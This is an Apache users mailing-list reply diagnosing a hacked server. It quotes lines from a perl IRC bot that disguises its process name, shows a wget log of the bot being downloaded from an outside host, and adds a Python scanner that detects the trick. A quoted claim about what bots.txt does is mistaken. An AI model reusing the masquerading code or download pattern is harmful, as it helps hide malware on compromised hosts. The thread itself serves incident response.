Re: [users@httpd] Please help... apache hacked?

Ricardo Kleemann wrote:

does ANYBODY even know what bots.txt even DOES?

bots.txt should look like this:

accept all
reject altaVista

look at virussin.com/bots.txt to see what it SHOULD do... it's for
SEARCH ENGINES. The bot grabs it, looks at it, and if it's on the
white list of engines, it caches the site; if it's on the blacklist
(reject), it sulks away into a corner...


This particular bots.txt is downloaded from tehboob.be and then is run (somehow) from /.

This bots.txt is a perl program that connects to irc servers and sends out apache access_log information.

I don't think it sends access_log information. The open file handles for "access_log" you mentioned have been inherited from the parent Apache process.


A few other clues... when I run ps, it shows the processes as "syslogd -m 0", but really when looked at with the "real" name it simply shows perl. It's just running the perl interpreter as nobody (since apache runs as nobody). When I look at lsof, it shows that the cwd is /. So how apache is able to download a program, and run it, from /, I don't understand.

That's exactly what bots.txt does:

my $processo = 'syslogd -m 0';   # the name the process will show in 'ps'
chdir("/");                      # explains the cwd of / you saw in lsof
$0 = "$processo" . "\0" x 16;    # overwrite argv[0], padded with NULs


How can I block apache from being able to do such a thing? Again, here's the output from the error_log that shows the download happening, and then I have no idea how, after downloaded, the program is run.

I expect that you are using an insecure PHP configuration allowing include() to fetch PHP scripts via HTTP (allow_url_fopen) and executing commands via the PHP functions exec, system, popen, passthru ...

That may be the way a foreign attacker invokes the perl interpreter on your machine.


--11:51:13--  http://tehboob.be/bots.txt
          => `bots.txt'
Resolving tehboob.be... done.
Connecting to tehboob.be[72.20.8.243]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,378 [text/plain]

0K .......... .......... ........ 100% 683.08 KB/s

My guess is that maybe the hackers installed a program that is performing this download. But I've searched the joomla installation for any file containing "bots.txt" to no success.




Can someone explain why this is logged in the error_log and not in the access_log?

Wget writes status information to STDERR when retrieving files, and so it gets passed to the error_log.
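A defender-side check for the masquerading discussed above, added here as an example and not code from the thread: it compares what a process claims in argv[0] (the part a perl `$0 = ...` rewrites) against the real binary behind /proc/PID/exe, which $0 cannot change, and also flags interpreters running as the web-server account or with cwd /. The interpreter list and the web-server account names are assumptions; the constructed process records in the test mirror the "syslogd -m 0" case from the thread.

```python
import os
import pwd
import re

# Interpreters a dropped script is likely to run under, and accounts a web server
# commonly runs as (both lists are assumptions; in the thread Apache ran as 'nobody').
INTERPRETER_RE = re.compile(r"^(perl|python|php|ruby)[\d.]*$")
WEB_USERS = {"nobody", "apache", "www-data", "httpd"}

def inspect_process(cmdline, exe, cwd, user):
    """Findings for one process. cmdline is argv as 'ps' shows it (what '$0 = ...'
    rewrites); exe and cwd are the resolved /proc/PID/exe and /proc/PID/cwd links,
    which assigning $0 cannot change; user is the account the process runs as."""
    findings = []
    argv = cmdline.split()
    claimed = os.path.basename(argv[0]) if argv else ""
    real = os.path.basename(exe)
    if INTERPRETER_RE.match(real):
        if claimed and not INTERPRETER_RE.match(claimed):
            findings.append(f"argv[0] claims '{claimed}' but exe is {exe}")
        if user in WEB_USERS:
            findings.append(f"{real} running as web-server account '{user}'")
        if cwd == "/":
            findings.append(f"{real} running with cwd '/' (the bot does chdir('/'))")
    return findings

def scan_proc(proc="/proc"):
    """Walk /proc and return {pid: findings} for every process with a finding."""
    results = {}
    for entry in os.listdir(proc) if os.path.isdir(proc) else []:
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as f:
                # the bot pads $0 with NULs, so treat NUL as an argv separator
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace")
            exe = os.readlink(os.path.join(base, "exe"))
            cwd = os.readlink(os.path.join(base, "cwd"))
            uid = os.stat(base).st_uid
        except OSError:
            continue  # process exited, or not readable without root
        try:
            user = pwd.getpwuid(uid).pw_name
        except KeyError:
            user = str(uid)
        findings = inspect_process(cmdline, exe, cwd, user)
        if findings:
            results[int(entry)] = findings
    return results
```

Run scan_proc() as root to see every process; unprivileged runs silently skip processes whose /proc links are not readable.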


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
  "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
